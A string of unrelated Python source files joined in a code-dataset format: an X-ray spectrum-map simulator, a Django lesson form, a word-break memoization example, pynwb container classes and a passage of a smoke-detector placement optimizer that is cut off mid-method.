            if energy_edges_keV[i] <= energy_keV < energy_edges_keV[i + 1]:
                counts_data[i] += intensity
                break  # bins are disjoint: no later bin can also match
    return counts_data
def change_energy_scale2(energy_data, intensity_data, energy_edges_keV):
    """Rebin intensities onto energy_edges_keV using a binary search per sample.

    Like change_energy_scale but O(log n) per sample via np.searchsorted.  The
    last (energy, intensity) pair is skipped, preserving the original
    behavior.  Fixes: np.float (removed in NumPy 1.24) -> float, and
    out-of-range energies are now dropped instead of wrapping into the last
    bin (index -1) or raising IndexError past the upper edge.

    Args:
        energy_data: Sample energies (keV); last entry is ignored.
        intensity_data: Intensity per sample; last entry is ignored.
        energy_edges_keV: Monotonically increasing bin edges (keV).

    Returns:
        Float array of summed intensities, one entry per bin.
    """
    counts_data = np.zeros(len(energy_edges_keV) - 1, dtype=float)
    for energy_keV, intensity in zip(energy_data[:-1], intensity_data[:-1]):
        i = np.searchsorted(energy_edges_keV, energy_keV, side="right") - 1
        if 0 <= i < len(counts_data):
            counts_data[i] += intensity
    return counts_data
def _create_spectra_maps(data_path, hdf5_file_path, hdf5_file_out_path, positions):
    """Generate spectrum-map datasets for a set of pixel dwell times.

    Reads the simulated spectra from `hdf5_file_path` and appends one map per
    dwell time to the "maps" group of `hdf5_file_out_path` via _create_map.
    """
    logging.info("_create_spectra_maps")
    depth = 1024
    data_type = np.int32
    current_nA = 1.0
    solid_angle_rad = 0.00140035
    detector_noise_eV = 50
    efficiency = get_efficiency()
    with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
        simulations_group = hdf5_file["simulations"]
        times_s = [0.005, 0.01, 0.05, 0.1, 0.5, 1.0, 5.0, 10.0, 50.0, 100.0, 500.0, 1000.0]
        # NOTE(review): the next line discards the full dwell-time list and
        # keeps only 0.1 s -- looks like a debugging leftover; confirm intent.
        times_s = [0.1]
        with h5py.File(hdf5_file_out_path, 'a', driver='core') as hdf5_file:
            maps_group = hdf5_file.require_group("maps")
            for time_s in times_s:
                _create_map(current_nA, data_type, depth, detector_noise_eV, efficiency, maps_group,
                            simulations_group, solid_angle_rad, time_s, positions)
def _create_map(current_nA, data_type, depth, detector_noise_eV, efficiency, maps_group, simulations_group,
                solid_angle_rad, time_s, positions):
    """Build one spectrum-map data cube for dwell time `time_s` and write it out.

    For every simulated beam position on the pixel grid: draw the electron
    dose, convert the emitted spectrum to detected counts, smear by detector
    resolution, and histogram into the (y, x, energy) cube; then persist the
    cube plus metadata via _write_map.  Skips if the map already exists.
    """
    logging.info("_create_map {}".format(time_s))
    time_us = time_s * 1.0e6
    map_name = "map %i us" % (time_us)
    if map_name in maps_group:
        logging.info("Map already exist skip it: {}".format(map_name))
        return
    shape = (positions.y_pixels, positions.x_pixels, depth)
    data = np.zeros(shape, dtype=data_type)
    for group in simulations_group.values():
        # Skip the simulation-parameters group; only result groups have spectra.
        if not group.name.endswith(HDF5_PARAMETERS):
            try:
                # Map the simulated beam position onto pixel indices.
                index_x = np.where(positions.xs_nm == group.attrs["beamPosition"][0])[0][0]
                index_y = np.where(positions.ys_nm == group.attrs["beamPosition"][1])[0][0]
                nominal_number_electrons, number_electrons = _compute_number_electrons(current_nA, time_s)
                delta_energy_keV, energy_data, intensity_data = _compute_intensity(efficiency, group, number_electrons,
                                                                                   solid_angle_rad, depth)
                xrays = _compute_xrays(detector_noise_eV, energy_data, intensity_data)
                counts, energies_keV = _compute_counts(data, depth, index_x, index_y, xrays)
            except IndexError:
                # Beam position not on the pixel grid: skip this simulation.
                pass
    # NOTE(review): nominal_number_electrons and energies_keV are assigned
    # inside the loop above; if no simulation matched the grid they are
    # unbound here and this call raises UnboundLocalError.
    _write_map(current_nA, data, data_type, depth, detector_noise_eV, energies_keV, maps_group,
               nominal_number_electrons, shape, solid_angle_rad, time_s, positions)
def _write_map(current_nA, data, data_type, depth, detector_noise_eV, energies_keV, maps_group,
               nominal_number_electrons, shape, solid_angle_rad, time_s, positions):
    """Write one spectrum-map cube plus its metadata and axis scales into HDF5.

    Stores the (y, x, energy) cube as a dataset named "map <time> us" in
    `maps_group`, attaches acquisition metadata as attributes, and links the
    x/y/energy axis datasets as HDF5 dimension scales.

    Fix: the axis datasets used np.float, an alias removed in NumPy 1.24; the
    builtin float (float64) is the exact equivalent.
    """
    logging.info("_write_map {}".format(time_s))
    detector = DetectorFunction(detector_noise_eV)
    time_us = time_s * 1.0e6
    map_name = "map {} us".format(time_us)
    map_data_set = maps_group.require_dataset(map_name, shape, dtype=data_type)
    map_data_set[...] = data
    map_data_set.attrs[MAP_WIDTH] = positions.x_pixels
    map_data_set.attrs[MAP_HEIGHT] = positions.y_pixels
    map_data_set.attrs[MAP_DEPTH] = depth
    map_data_set.attrs[MAP_DATA_TYPE] = str(data_type)
    map_data_set.attrs[MAP_PIXEL_TIME_s] = time_s
    map_data_set.attrs[MAP_CURRENT_nA] = current_nA
    map_data_set.attrs[MAP_NOMINAL_NUMBER_ELECTRONS] = nominal_number_electrons
    map_data_set.attrs[MAP_SOLID_ANGLE_rad] = solid_angle_rad
    map_data_set.attrs[MAP_DETECTOR_NOISE_eV] = detector_noise_eV
    # Conventional detector figure of merit: FWHM at the Mn Ka line (5898 eV).
    map_data_set.attrs[MAP_DETECTOR_RESOLUTION_AT_MN_eV] = detector.getFwhm_eV(5898.0)
    map_data_set.attrs[MAP_COMMENTS] = "data[X, Y, D]"
    width_data_set = maps_group.require_dataset(MAP_DATA_WIDTH_nm, (positions.x_pixels,), dtype=float)
    width_data_set[...] = positions.xs_nm
    height_data_set = maps_group.require_dataset(MAP_DATA_HEIGHT_nm, (positions.y_pixels,), dtype=float)
    height_data_set[...] = positions.ys_nm
    depth_data_set = maps_group.require_dataset(MAP_DATA_DEPTH_keV, (depth,), dtype=float)
    depth_data_set[...] = energies_keV
    # NOTE(review): dims.create_scale was deprecated in h5py 2.10 in favour of
    # dims.make_scale -- left as-is to match the installed h5py version.
    map_data_set.dims.create_scale(width_data_set, "X (nm)")
    map_data_set.dims.create_scale(height_data_set, "Y (nm)")
    map_data_set.dims.create_scale(depth_data_set, "Energies (keV)")
    map_data_set.dims[0].attach_scale(width_data_set)
    map_data_set.dims[1].attach_scale(height_data_set)
    map_data_set.dims[2].attach_scale(depth_data_set)
def _compute_counts(data, depth, index_x, index_y, xrays):
energy_edges_keV = np.linspace(0.0, 30.0, depth + 1)
energies_keV = np.linspace(0.0, 30.0, depth)
counts, _bin_edges = np.histogram(xrays, bins=energy_edges_keV)
data[index_y, index_x, :] = counts
return counts, energies_keV
def _compute_xrays(detector_noise_eV, energy_data, intensity_data):
    """Simulate the individual X-ray energies recorded by the detector.

    For each channel, the photon count is Poisson-distributed around the
    nominal intensity, and each photon's energy is Gaussian-smeared by the
    detector resolution (sigma) at that channel.

    Returns:
        A flat list of simulated photon energies (keV).
    """
    detector = DetectorFunction(detector_noise_eV)
    sigmas_keV = detector.get_sigmas_keV(energy_data)
    xrays = []
    for energy_keV, sigma_keV, nominal in zip(energy_data, sigmas_keV, intensity_data):
        # Poisson-distributed photon count for this channel.
        photon_count = int(round(poisson(nominal)))
        smeared_energies = normal(energy_keV, sigma_keV, size=photon_count)
        xrays.extend(smeared_energies.tolist())
    return xrays
def _compute_intensity(efficiency, group, number_electrons, solid_angle_rad, depth):
    """Convert one simulation's emitted spectrum (1/keV/e-/sr) into counts per channel.

    Applies the detector efficiency curve, scales by electron dose, solid
    angle and channel width, then rebins onto the `depth`-channel 0-30 keV
    output scale via change_energy_scale2.

    Returns:
        (delta_energy_keV, energies_keV, counts_data): the source channel
        width, the output channel centers, and the rebinned counts.
    """
    energy_data = group["XraySpectraRegionsEmitted/energies_keV"][:]
    spectrum_1_ekeVsr = group["XraySpectraRegionsEmitted/total_1_ekeVsr"][:]
    # Detector efficiency, interpolated onto this spectrum's energy grid.
    spectrum_1_ekeVsr = spectrum_1_ekeVsr * np.interp(energy_data, efficiency[:, 0], efficiency[:, 1])
    delta_energy_keV = energy_data[1] - energy_data[0]
    intensity_data = spectrum_1_ekeVsr * number_electrons * solid_angle_rad * delta_energy_keV
    energy_edges_keV = np.linspace(0.0, 30.0, depth + 1)
    energies_keV = np.linspace(0.0, 30.0, depth)
    counts_data = change_energy_scale2(energy_data, intensity_data, energy_edges_keV)
    return delta_energy_keV, energies_keV, counts_data
def _compute_number_electrons(current_nA, time_s):
nominal_number_electrons = current_nA * 1.0e-9 * time_s / e
try:
number_electrons = poisson(nominal_number_electrons)
except ValueError as message:
number_electrons = normal(nominal_number_electrons, np.sqrt(nominal_number_electrons))
return nominal_number_electrons, number_electrons
def _export_raw_map(hdf5_file_path):
    """Export every map dataset of an HDF5 maps file to Bruker .rpl/.raw pairs.

    Walks the "maps" group, and for each dataset whose path starts with
    /maps/map writes a .rpl parameter file plus a raw int32 memmap dump next
    to the source file (suffix derived from the map name).
    """
    from pySpectrumFileFormat.Bruker.MapRaw.ParametersFile import ParametersFile, BYTE_ORDER_LITTLE_ENDIAN, \
        RECORED_BY_VECTOR, DATA_TYPE_SIGNED
    logging.info("_export_raw_map")
    with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
        maps_group = hdf5_file["maps"]
        for name, group in maps_group.items():
            # Only the map cubes; skips the axis-scale datasets in the group.
            if str(group.name).startswith("/maps/map"):
                map_data_set = group
                logging.info(group.name)
                logging.info(name)
                parameters_file = ParametersFile()
                parameters_file.width = map_data_set.attrs[MAP_WIDTH]
                parameters_file.height = map_data_set.attrs[MAP_HEIGHT]
                parameters_file.depth = map_data_set.attrs[MAP_DEPTH]
                parameters_file.offset = 0
                parameters_file.dataLength_B = 4
                parameters_file.dataType = DATA_TYPE_SIGNED
                parameters_file.byteOrder = BYTE_ORDER_LITTLE_ENDIAN
                parameters_file.recordBy = RECORED_BY_VECTOR
                parameters_file.energy_keV = 30.0
                parameters_file.pixel_size_nm = 0.0
                # "<file>.hdf5" -> "<file>_<map_name_with_underscores>" base path.
                base_file_out_path = hdf5_file_path[:-5] + "_" + name.replace(' ', '_')
                parameters_file.write(base_file_out_path + ".rpl")
                shape = (parameters_file.height, parameters_file.width, parameters_file.depth)
                # Dump the cube as a raw int32 memmap alongside the .rpl file.
                fp = np.memmap(base_file_out_path + ".raw", dtype=np.int32, mode='w+', shape=shape)
                fp[:] = map_data_set[:]
                del fp
if __name__ == '__main__':
    import sys
    logging.getLogger().setLevel(logging.INFO)
    # The data directory may be given as the first command-line argument;
    # otherwise fall back to the author's default results location.
    if len(sys.argv) > 1:
        data_path = sys.argv[1]
    else:
        data_path = r"D:\work\Dropbox\hdemers\professional\results\simulations\mcxray\SimulationMapsMM2017\analyzes"
    logging.debug(sys.argv)
    logging.info(data_path)
    # Individual processing steps; uncomment the ones to run.
    # create_test_map(data_path, figure=True)
    # export_raw_test_map(data_path)
    # read_raw_test_map(data_path)
    # create_map_mm2017_abstract(data_path)
    # export_raw_map_mm2017_abstract(data_path)
    # read_raw_map_mm2017_abstract(data_path)
    # bse_image_mm2017(data_path)
    logging.info("Done")
    plt.show()
| StarcoderdataPython |
3392149 | """Get extra charge profile names API method."""
from ibsng.handler.handler import Handler
class getExtraChargeProfileNames(Handler):
    """Handler for the ``getExtraChargeProfileNames`` API call.

    All behaviour is inherited from :class:`Handler`; no overrides are needed.
    """
| StarcoderdataPython |
4806816 | <filename>python/word_break.py
"""
Word break problem
Given an input string and a dictionary of words, segment
the input string into a space-separated sequence of
dictionary words if possible. For example, if the input
string is "applepie" and dictionary contains a standard
set of English words, then we would return the string
"apple pie" as output.
From: http://thenoisychannel.com/2011/08/08/retiring-a-great-interview-problem
See also: http://stackoverflow.com/questions/21273505/memoization-algorithm-time-complexity
"""
# Toy word list used by is_word(); a real application would load a full
# English dictionary here.
DICTIONARY = set("""
bed bath and beyond bat bad on be an a at hand ton bean yon hat zz zzz zxzz
""".split())
def is_word(s):
    """Return True if *s* is an entry in DICTIONARY."""
    return s in DICTIONARY
## could use functools.lru_cache, but why not write our
## own memoize decorator
def memoize(f):
    """Memoize a single-argument function.

    The argument must be hashable (here it is always a string). Results are
    cached for the lifetime of the wrapped function, which turns the
    exponential recursion in ``word_break`` into polynomial time.
    """
    # Local import keeps the module's top-level imports unchanged.
    from functools import wraps

    cache = {}

    @wraps(f)  # preserve f's __name__/__doc__ on the wrapper
    def wrapper(s):
        if s not in cache:
            cache[s] = f(s)
        return cache[s]
    return wrapper
## memoize calls to word_break to avoid repeated computations when we
## find different paths to the same substring
@memoize
def word_break(s):
    """Segment *s* into dictionary words.

    Returns a list of words whose concatenation is *s*, or None when no such
    segmentation exists. The empty string segments into the empty list.
    """
    if not s:
        return []
    # Try every suffix, longest first, and recurse on the remaining prefix.
    for split_at in range(len(s) - 1, -1, -1):
        tail = s[split_at:]
        if not is_word(tail):
            continue
        head_words = word_break(s[:split_at])
        if head_words is not None:
            return head_words + [tail]
    return None
def test():
    """Print segmentations for a few representative inputs."""
    samples = (
        "bedbathandbeyond",
        "zzzxzzzzzxzzzzzzxzzzzzzxzzzzzxzzzzzxzzzxzzzxzz",
        "bedbathandbe",
        "beanhat",
    )
    for sample in samples:
        print(word_break(sample))
def test_monster_string():
    """Stress test: segment 1000 random dictionary words glued together."""
    import random
    import sys
    # One recursion frame per word boundary, so raise the default limit.
    sys.setrecursionlimit(10000)
    words = random.choices(tuple(DICTIONARY), k=1000)
    print(word_break(''.join(words)))
# Run the quick demo when executed as a script.
if __name__ == "__main__":
    test()
    # test_monster_string()  # slow stress test; enable manually
| StarcoderdataPython |
1700810 | from django import forms
from .models import Lesson, ClassType, Coach
class DateInput(forms.DateInput):
    # Render as an HTML5 <input type="date"> so browsers show a date picker.
    input_type = 'date'
class TimeInput(forms.TimeInput):
    # Render as an HTML5 <input type="time"> so browsers show a time picker.
    input_type = 'time'
class LessonForm(forms.ModelForm):
    """Form for creating and editing Lesson instances.

    Replaces the default class-type and coach choices with human-friendly
    labels, swaps in HTML5 date/time widgets, and applies a shared CSS class
    to every widget.
    """

    class Meta:
        model = Lesson
        fields = ('class_type', 'coach',
                  'description', 'price',
                  'date', 'time', 'spots')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Friendly labels instead of the raw model __str__ values.
        self.fields['class_type'].choices = [
            (ct.id, ct.get_friendly_name()) for ct in ClassType.objects.all()
        ]
        self.fields['coach'].choices = [
            (person.id, person.get_first_name()) for person in Coach.objects.all()
        ]
        # Native browser pickers for date and time.
        self.fields['date'] = forms.DateField(widget=DateInput)
        self.fields['time'] = forms.TimeField(widget=TimeInput)
        # Uniform styling hook for the templates.
        for field in self.fields.values():
            field.widget.attrs['class'] = 'border-black'
| StarcoderdataPython |
29456 | <filename>src/pynwb/core.py
from collections import Iterable
from h5py import RegionReference
from .form.utils import docval, getargs, ExtenderMeta, call_docval_func, popargs
from .form import Container, Data, DataRegion, get_region_slicer
from . import CORE_NAMESPACE, register_class
from six import with_metaclass
def set_parents(container, parent):
    """Assign *parent* to every container that does not yet have one.

    *container* may be a single object or a list of objects; in both cases a
    list of the affected containers is returned (the original list when one
    was passed in). Containers whose ``parent`` is already set are left alone.
    """
    if not isinstance(container, list):
        if container.parent is None:
            container.parent = parent
        return [container]
    for child in container:
        if child.parent is None:
            child.parent = parent
    return container
class NWBBaseType(with_metaclass(ExtenderMeta)):
    '''The base class to any NWB types.

    The purpose of this class is to provide a mechanism for representing
    hierarchical relationships in neurodata. Subclasses list their exportable
    fields in ``__nwbfields__``; the ``ExtenderMeta.pre_init`` hook below then
    generates a property (getter + write-once setter) for each listed field.
    '''
    # Tuple of field names to expose as properties; extended by subclasses.
    __nwbfields__ = tuple()
    @docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
            {'name': 'parent', 'type': 'NWBContainer',
             'doc': 'the parent Container for this Container', 'default': None},
            {'name': 'container_source', 'type': object,
             'doc': 'the source of this Container e.g. file name', 'default': None})
    def __init__(self, **kwargs):
        parent, container_source = getargs('parent', 'container_source', kwargs)
        super(NWBBaseType, self).__init__()
        # Backing store for the generated __nwbfields__ properties.
        self.__fields = dict()
        self.__parent = None
        self.__name = getargs('name', kwargs)
        # Assign through the property so the write-once check applies.
        if parent:
            self.parent = parent
        self.__container_source = container_source
    @property
    def name(self):
        # Read-only: the name is fixed at construction time.
        return self.__name
    @property
    def container_source(self):
        '''The source of this Container e.g. file name or table
        '''
        return self.__container_source
    @property
    def fields(self):
        # Dict backing the auto-generated __nwbfields__ properties.
        return self.__fields
    @property
    def parent(self):
        '''The parent NWBContainer of this NWBContainer
        '''
        return self.__parent
    @parent.setter
    def parent(self, parent_container):
        # Parents are write-once: reassigning would corrupt the hierarchy.
        if self.__parent is not None:
            raise Exception('cannot reassign parent')
        self.__parent = parent_container
    @staticmethod
    def __getter(nwbfield):
        # Build a getter closure for one auto-generated field property.
        def _func(self):
            return self.fields.get(nwbfield)
        return _func
    @staticmethod
    def __setter(nwbfield):
        # Build a write-once setter closure for one auto-generated field property.
        def _func(self, val):
            if nwbfield in self.fields:
                msg = "can't set attribute '%s' -- already set" % nwbfield
                raise AttributeError(msg)
            self.fields[nwbfield] = val
        return _func
    @ExtenderMeta.pre_init
    def __gather_nwbfields(cls, name, bases, classdict):
        '''
        This classmethod will be called during class declaration in the metaclass to automatically
        create setters and getters for NWB fields that need to be exported
        '''
        if not isinstance(cls.__nwbfields__, tuple):
            raise TypeError("'__nwbfields__' must be of type tuple")
        # Prepend inherited fields so subclasses see the full, ordered set.
        if len(bases) and 'NWBContainer' in globals() and issubclass(bases[-1], NWBContainer) \
                and bases[-1].__nwbfields__ is not cls.__nwbfields__:
            new_nwbfields = list(cls.__nwbfields__)
            new_nwbfields[0:0] = bases[-1].__nwbfields__
            cls.__nwbfields__ = tuple(new_nwbfields)
        # Generate a property per field, unless the class defines one itself.
        for f in cls.__nwbfields__:
            if not hasattr(cls, f):
                setattr(cls, f, property(cls.__getter(f), cls.__setter(f)))
@register_class('NWBContainer', CORE_NAMESPACE)
class NWBContainer(NWBBaseType, Container):
    """Base container type; adds a required ``source`` and optional ``help`` field."""
    __nwbfields__ = ('source',
                     'help')
    @docval({'name': 'source', 'type': str, 'doc': 'a description of where this NWBContainer came from'},
            {'name': 'name', 'type': str, 'doc': 'the name of this container'},
            {'name': 'parent', 'type': 'NWBContainer',
             'doc': 'the parent Container for this Container', 'default': None},
            {'name': 'container_source', 'type': object,
             'doc': 'the source of this Container e.g. file name', 'default': None})
    def __init__(self, **kwargs):
        call_docval_func(super(NWBContainer, self).__init__, kwargs)
        # 'source' goes through the auto-generated write-once property.
        self.source = getargs('source', kwargs)
@register_class('NWBData', CORE_NAMESPACE)
class NWBData(NWBBaseType, Data):
    """Base type for NWB datasets: a named wrapper around an iterable of data."""
    __nwbfields__ = ('help',)
    @docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
            {'name': 'data', 'type': (Iterable, Data), 'doc': 'the source of the data'},
            {'name': 'parent', 'type': 'NWBContainer',
             'doc': 'the parent Container for this Container', 'default': None},
            {'name': 'container_source', 'type': object,
             'doc': 'the source of this Container e.g. file name', 'default': None})
    def __init__(self, **kwargs):
        call_docval_func(super(NWBData, self).__init__, kwargs)
        self.__data = getargs('data', kwargs)
    @property
    def data(self):
        # Read-only access to the wrapped data.
        return self.__data
class NWBTable(NWBData):
    """A named, column-oriented table whose rows are stored as tuples in ``data``."""
    @docval({'name': 'columns', 'type': (list, tuple), 'doc': 'a list of the columns in this table'},
            {'name': 'name', 'type': str, 'doc': 'the name of this container'},
            {'name': 'data', 'type': Iterable, 'doc': 'the source of the data', 'default': list()},
            {'name': 'parent', 'type': 'NWBContainer',
             'doc': 'the parent Container for this Container', 'default': None},
            {'name': 'container_source', 'type': object,
             'doc': 'the source of this Container e.g. file name', 'default': None})
    def __init__(self, **kwargs):
        # Columns are fixed at construction; popargs removes them before the
        # remaining kwargs are forwarded to NWBData.__init__.
        self.__columns = tuple(popargs('columns', kwargs))
        call_docval_func(super(NWBTable, self).__init__, kwargs)
    @property
    def columns(self):
        # The ordered column names of this table.
        return self.__columns
    @docval({'name': 'values', 'type': dict, 'doc': 'the values for each column'})
    def add_row(self, **kwargs):
        """Append one row; *values* must contain an entry for every column."""
        values = getargs('values', kwargs)
        # Rows can only be appended when data is an in-memory list (e.g. not
        # a read-only dataset backed by a file).
        if not isinstance(self.data, list):
            msg = 'Cannot append row to %s' % type(self.data)
            raise ValueError(msg)
        self.data.append(tuple(values[col] for col in self.columns))
    @docval({'name': 'kwargs', 'type': dict, 'doc': 'the column to query by'})
    def query(self, **kwargs):
        '''
        Query a table. Not implemented on the base class; subclasses must override.
        '''
        raise NotImplementedError('query')
    def __len__(self):
        # Number of rows.
        return len(self.data)
    def __getitem__(self, idx):
        # Row access by index/slice.
        return self.data[idx]
# diamond inheritance
class NWBTableRegion(NWBData, DataRegion):
    '''
    A class for representing regions i.e. slices or indices into an NWBTable
    '''
    @docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
            {'name': 'table', 'type': NWBTable, 'doc': 'the ElectrodeTable this region applies to'},
            {'name': 'region', 'type': (slice, list, tuple, RegionReference), 'doc': 'the indices of the table'})
    def __init__(self, **kwargs):
        table, region = getargs('table', 'region', kwargs)
        self.__table = table
        self.__region = region
        name = getargs('name', kwargs)
        super(NWBTableRegion, self).__init__(name, table)
        # The slicer resolves the region lazily against the table's data.
        self.__regionslicer = get_region_slicer(self.__table.data, self.__region)
    @property
    def table(self):
        '''The ElectrodeTable this region applies to'''
        return self.__table
    @property
    def region(self):
        '''The indices into table'''
        return self.__region
    def __len__(self):
        # Number of rows selected by the region.
        return len(self.__regionslicer)
    def __getitem__(self, idx):
        # Index within the region (not within the underlying table).
        return self.__regionslicer[idx]
| StarcoderdataPython |
1787218 | <gh_stars>0
#!/usr/bin/env python
# coding: utf-8
from SDOptimizer.constants import DATA_FILE, PLOT_TITLES, ALARM_THRESHOLD, PAPER_READY, INFEASIBLE_MULTIPLE, NEVER_ALARMED_MULTIPLE, SMOOTH_PLOTS, INTERPOLATION_METHOD
from SDOptimizer.functions import make_location_objective, make_counting_objective, make_lookup, make_total_lookup_function, convert_to_spherical_from_points
from SDOptimizer.visualization import show_optimization_statistics, show_optimization_runs
from time import sleep
# from tqdm.notebook import trange, tqdm # For plotting progress
from tqdm import trange, tqdm
from platypus import NSGAII, Problem, Real, Binary, Integer, CompoundOperator, SBX, HUX, PM, BitFlip
from mpl_toolkits import mplot3d
from scipy.interpolate import griddata
from scipy.optimize import minimize, differential_evolution, rosen, rosen_der, fmin_l_bfgs_b
import os
import glob
import logging
import pdb
import scipy
import matplotlib.animation as animation
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
from matplotlib import cm
from importlib import reload
import io
import pandas as pd
import numpy as np
import matplotlib
import warnings
import copy
matplotlib.use('module://ipykernel.pylab.backend_inline')
class SDOptimizer():
    """Optimize smoke-detector placement from smoke-propagation simulation data.

    NOTE(review): several methods rely on attributes/methods not defined in
    this class body (e.g. ``load_data``, ``get_time_to_alarm``, ``pmesh_plot``,
    ``optimize``, ``self.concentrations``, ``self.max_concentrations``) --
    presumably provided elsewhere or mixed in; confirm before use.
    """
    def __init__(self, interpolation_method=INTERPOLATION_METHOD, **kwargs):
        self.logger = logging.getLogger('main')
        self.logger.debug("Instantiated the optimizer")
        # X/Y/Z sample locations and the time-to-alarm values are filled in
        # later by the data-loading methods.
        self.is3d = False
        self.X = None
        self.Y = None
        self.Z = None
        self.time_to_alarm = None
        self.interpolation_method = interpolation_method
    def visualize(self, show=False, log=True):
        """Write one concentration-vs-position image per timestep to ./vis.

        TODO update this so it outputs a video

        show : Boolean
            Do a matplotlib plot of every frame
        log : Boolean
            plot the concentration on a log scale
        """
        # Shared color scale across all frames.
        max_concentration = max(self.max_concentrations)
        print("Writing output files to ./vis")
        for i, concentration in tqdm(
                enumerate(
                    self.concentrations), total=len(
                self.concentrations)):  # this is just wrapping it in a progress bar
            plt.cla()
            plt.clf()
            plt.xlabel("X position")
            plt.ylabel("Y position")
            plt.title("concentration at timestep {} versus position".format(i))
            # NOTE(review): `norm` is computed but never used below.
            norm = mpl.colors.Normalize(vmin=0, vmax=1.0)
            cb = self.pmesh_plot(
                self.X,
                self.Y,
                concentration,
                plt,
                log=log,
                max_val=max_concentration)
            plt.colorbar(cb)  # Add a colorbar to a plot
            plt.savefig("vis/concentration{:03d}.png".format(i))
            if show:
                plt.show()
    def get_3D_locs(self):
        # The (X, Y, Z) sample locations loaded from the simulation data.
        return (self.X, self.Y, self.Z)
    def example_time_to_alarm(self, x_bounds, y_bounds,
                              center, show=False, scale=1, offset=0):
        """Create a synthetic time-to-alarm surface (a paraboloid) for testing.

        x_bounds, y_bounds : the lower and upper bounds of the sampled region
        center : the (x, y) coordinates of the surface minimum
        scale : a multiplicative factor
        offset : is additive
        """
        Xs = np.linspace(*x_bounds)
        Ys = np.linspace(*y_bounds)
        x, y = np.meshgrid(Xs, Ys)
        # Squared distance from the center, then affine-transformed.
        z = (x - center[0]) ** 2 + (y - center[1]) ** 2
        z = z * scale + offset
        if show:
            plt.cla()
            plt.clf()
            cb = plt.pcolormesh(x, y, z, cmap=plt.cm.inferno)
            plt.colorbar(cb)  # Add a colorbar to a plot
            plt.pause(4.0)
        # Return flat arrays matching the real-data format.
        x = x.flatten()
        y = y.flatten()
        z = z.flatten()
        return (x, y, z)
    def make_platypus_objective_function(
            self, sources, func_type="basic", bad_sources=[]):
        """Dispatch to the requested platypus objective-function builder.

        sources : the smoke sources to cover
        bad_sources : ArrayLike[Sources]
            These are the ones which we don't want to be near
        """
        # NOTE(review): mutable default argument `bad_sources=[]`; harmless
        # here because it is only passed through, but fragile.
        if func_type == "basic":
            raise NotImplementedError("I'm not sure I'll ever do this")
            # return self.make_platypus_objective_function_basic(sources)
        elif func_type == "counting":
            return self.make_platypus_objective_function_counting(sources)
        elif func_type == "competing_function":
            return self.make_platypus_objective_function_competing_function(
                sources, bad_sources)
        else:
            raise ValueError("The type : {} is not an option".format(func_type))
    def make_platypus_objective_function_competing_function(
            self, sources, bad_sources=[]):
        """Two-objective problem: minimize alarm time for `sources`, maximize it for `bad_sources`."""
        total_ret_func = make_total_lookup_function(
            sources, interpolation_method=self.interpolation_method)  # the function to be optimized
        bad_sources_func = make_total_lookup_function(
            bad_sources, type="fastest",
            interpolation_method=self.interpolation_method)  # the function to be optimized
        def multiobjective_func(x):  # this is the double objective function
            return [total_ret_func(x), bad_sources_func(x)]
        num_inputs = len(sources) * 2  # there is an x, y for each source
        NUM_OUPUTS = 2  # the default for now
        # define the dimensionality of input and output spaces
        problem = Problem(num_inputs, NUM_OUPUTS)
        x, y, time = sources[0]  # expand the first source
        min_x = min(x)
        min_y = min(y)
        max_x = max(x)
        max_y = max(y)
        print(
            "min x : {}, max x : {}, min y : {}, max y : {}".format(
                min_x,
                max_x,
                min_y,
                max_y))
        problem.types[::2] = Real(min_x, max_x)  # This is the feasible region
        problem.types[1::2] = Real(min_y, max_y)
        problem.function = multiobjective_func
        # the second function should be maximized rather than minimized
        problem.directions[1] = Problem.MAXIMIZE
        return problem
    def make_platypus_objective_function_counting(
            self, sources, times_more_detectors=1):
        """
        This balances the number of detectors with the quality of the outcome
        """
        total_ret_func = make_total_lookup_function(
            sources, masked=True)  # the function to be optimized
        counting_func = make_counting_objective()
        def multiobjective_func(x):  # this is the double objective function
            return [total_ret_func(x), counting_func(x)]
        # there is an x, y, and a mask for each source so there must be three
        # times more input variables
        # the upper bound on the number of detectors n times the number of
        # sources
        num_inputs = len(sources) * 3 * times_more_detectors
        NUM_OUPUTS = 2  # the default for now
        # define the dimensionality of input and output spaces
        problem = Problem(num_inputs, NUM_OUPUTS)
        x, y, time = sources[0]  # expand the first source
        min_x = min(x)
        min_y = min(y)
        max_x = max(x)
        max_y = max(y)
        print(
            "min x : {}, max x : {}, min y : {}, max y : {}".format(
                min_x,
                max_x,
                min_y,
                max_y))
        problem.types[0::3] = Real(min_x, max_x)  # This is the feasible region
        problem.types[1::3] = Real(min_y, max_y)
        # This appears to be inclusive, so this is really just (0, 1)
        problem.types[2::3] = Binary(1)
        problem.function = multiobjective_func
        return problem
    def plot_inputs(self, inputs, optimized, show_optimal=False):
        """Plot the time-to-alarm surface of every smoke source, one subplot each."""
        plt.cla()
        plt.clf()
        f, ax = self.get_square_axis(len(inputs))
        max_z = 0
        for i, (x, y, z) in enumerate(inputs):
            max_z = max(max_z, max(z))  # record this for later plotting
            cb = self.pmesh_plot(x, y, z, ax[i])
            if show_optimal:
                # optimized is a flat [x1, y1, x2, y2, ...] detector vector.
                for j in range(0, len(optimized), 2):
                    detectors = ax[i].scatter(optimized[j], optimized[j + 1],
                                              c='w', edgecolors='k')
                    ax[i].legend([detectors], ["optimized detectors"])
        f.colorbar(cb)
        if PAPER_READY:
            plt.savefig("vis/TimeToAlarmComposite.png")
        f.suptitle("The time to alarm for each of the smoke sources")
        plt.show()
        return max_z
    def get_square_axis(self, num, is_3d=False):
        """
        Arrange subplots in a rough square based on the number of inputs
        """
        if num == 1:
            if is_3d:
                f, ax = plt.subplots(1, 1, projection='3d')
            else:
                f, ax = plt.subplots(1, 1)
            # Wrap the single Axes so callers can always index the result.
            ax = np.asarray([ax])
            return f, ax
        num_x = np.ceil(np.sqrt(num))
        num_y = np.ceil(num / num_x)
        if is_3d:
            f, ax = plt.subplots(int(num_y), int(num_x), projection='3d')
        else:
            f, ax = plt.subplots(int(num_y), int(num_x))
        ax = ax.flatten()
        return f, ax
    def plot_sweep(self, xytimes, fixed_detectors,
                   bounds, max_val=None, centers=None):
        """Sweep one extra detector over a grid while the others stay fixed, and plot the objective.

        xytimes : ArrayLike[Tuple[]]
